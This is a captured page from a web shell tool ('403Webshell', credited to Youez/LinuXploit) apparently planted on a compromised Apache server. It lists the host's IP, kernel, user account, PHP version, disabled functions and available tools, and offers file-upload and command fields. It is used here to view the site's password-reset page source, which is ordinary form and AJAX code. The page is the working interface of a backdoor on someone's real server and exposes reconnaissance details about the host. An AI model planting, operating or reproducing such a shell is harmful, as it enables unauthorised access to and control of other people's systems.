403Webshell
Server IP : 64.202.187.69  /  Your IP : 216.73.216.192
Web Server : Apache
System : Linux 69.187.202.64.host.secureserver.net 3.10.0-1160.144.1.el7.tuxcare.els6.x86_64 #1 SMP Fri May 29 16:22:24 UTC 2026 x86_64
User : transmarket ( 1001)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/transmarket/translator/devsite/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/transmarket/translator/devsite/confirm-password.php
<?php
include 'header_without_login.php';

?>
<!-- /.login-logo -->
<body class="login-page">
  <header>
    <!-- Intro Section -->
    <section class="view intro-2">
      <div class="mask rgba-stylish-strong h-100 d-flex justify-content-center align-items-center">
        <div class="container">
          <div class="row">
            <div class="col-xl-5 col-lg-6 col-md-10 col-sm-12 mx-auto mt-5">

              <!-- Form with header -->
              <div class="card wow fadeIn" data-wow-delay="0.3s">
                <div class="card-body">
					<form class="login-form mt-0" method="post">
						<!-- Header -->
						<div class="form-header purple-gradient">
						<h3 class="font-weight-500 my-2 py-1"><i class="fas fa-user"></i> Reset Your Password:</h3>
						</div>

						<!-- Body -->

						<div class="md-form">
							<i class="fas fa-lock prefix white-text"></i>
							<input type="password" class="form-control validate" id="password" data-type="text" placeholder="Enter new password" autocomplete="off" required>
							<label for="password">New Password</label>
						</div>
						<div class="md-form">
							<i class="fas fa-lock prefix white-text"></i>
							<input type="password" class="form-control validate" id="rePassword" data-type="text" placeholder="Enter confirm password" autocomplete="off" required>
							<label for="rePassword">Confirm New Password</label>
						</div>
						<div class="text-center">
							<button class="btn purple-gradient btn-lg btn-login" id="btn-login">Reset Password</button> 
						</div>
						<div class="col-lg-12 text-center white-text">
							<span class="success-message"></span>
							<span class="error-message"></span>
						</div>
					</form>
                </div>
              </div>
              <!-- Form with header -->

            </div>
          </div>
        </div>
      </div>
    </section>
    <!-- Intro Section -->

  </header>
  <!-- Main Navigation -->

<!-- SCRIPTS -->
<!-- JQuery -->
<script type="text/javascript" src="js/jquery-3.4.1.min.js"></script>
<!-- Bootstrap tooltips -->
<script type="text/javascript" src="js/popper.min.js"></script>
<!-- Bootstrap core JavaScript -->
<script type="text/javascript" src="js/bootstrap.min.js"></script>
<!-- MDB core JavaScript -->
<script type="text/javascript" src="js/mdb.min.js"></script>

<!-- Custom scripts -->
<script>

new WOW().init();

</script>
<script>
function getQueryStringValue (key) {  
      return decodeURIComponent(window.location.search.replace(new RegExp("^(?:.*[&\\?]" + encodeURIComponent(key).replace(/[\.\+\*]/g, "\\$&") + "(?:\\=([^&]*))?)?.*$", "i"), "$1"));  
    } 
$("body").on('click', '#btn-login', function (e) {
	var error = 0;
	var password = $('#password').val().trim();
	var rePassword = $('#rePassword').val().trim();
	if($('#password').val() == '' || $('#rePassword').val() == '') {
		toastr.error("Please enter password or re-password");
	} else {
		if(password != rePassword) {
			toastr.error("Passwords should match.");
		} else {
			$(this).html('<span class="spinner-border spinner-border-sm mr-2" role="status" aria-hidden="true"></span>Loading...').attr('disabled', true);			
			
			$.ajax({url: 'controllers/confirm_password.php',
				data: {
					id: getQueryStringValue("id"),
					salt: getQueryStringValue("salt"),
					password: $('#password').val().trim(),
					rePassword: $('#rePassword').val(),
				},
				type: 'post',
				dataType: 'JSON',
				context: this,
				success: function (output) {
					if (output.status == 200 ) {
						toastr.success(output.message);
						window.location.href = "login.php";
					} else {
						toastr.error(output.message);
					}
					$(this).html('Reset Password').attr('disabled', false);
				}
			});
		}
	}
	e.preventDefault();
});
</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit